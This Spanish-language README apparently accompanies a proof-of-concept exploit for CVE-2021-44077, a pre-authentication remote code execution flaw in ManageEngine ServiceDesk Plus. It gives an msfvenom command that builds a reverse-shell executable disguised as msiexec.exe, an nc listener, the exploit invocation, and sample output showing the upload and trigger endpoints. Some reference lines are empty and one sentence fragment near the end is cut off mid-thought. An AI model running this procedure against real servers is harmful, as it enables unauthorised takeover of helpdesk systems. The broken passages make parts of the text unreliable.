
Exploit de Prueba de Concepto para ManageEngine ServiceDesk Plus CVE-2021-44077
Exploit de Prueba de Concepto para CVE-2021-44077: RCE PreAuth en ManageEngine ServiceDesk Plus < 11306
Basado en:
Aviso de CISA:
Remediación (Actualice a Build 11306 o posterior):
Probado en ManageEngine ServiceDesk Plus Build 11303. Todo el antivirus deshabilitado.
El exploit sube un ejecutable de Windows al objetivo y lo ejecuta.
Para explotar la vulnerabilidad, primero genere cualquier ejecutable. Por ejemplo:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe
Ejecute pip install con el archivo de requisitos o asegúrese de tener el paquete requests.
Si está intentando recibir una reverse shell, ejecute primero su listener, p. ej.:
nc -l 4444
Luego ejecute el script del exploit, pasando los argumentos url y exe, p. ej.:
python exploit.py http://<TARGET>:<PORT> <path_to_exe>
Ejemplo de salida del script:
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

bin de instalación, incluidos archivos existentes como scripts por lotes. Puede haber otras formas de invocar el archivo subido.Este software ha sido creado únicamente con fines de investigación académica y para el desarrollo de técnicas defensivas eficaces, y no está destinado a atacar sistemas salvo que se cuente con autorización explícita. Los mantenedores del proyecto no se hacen responsables del uso indebido del software. Úselo de forma responsable.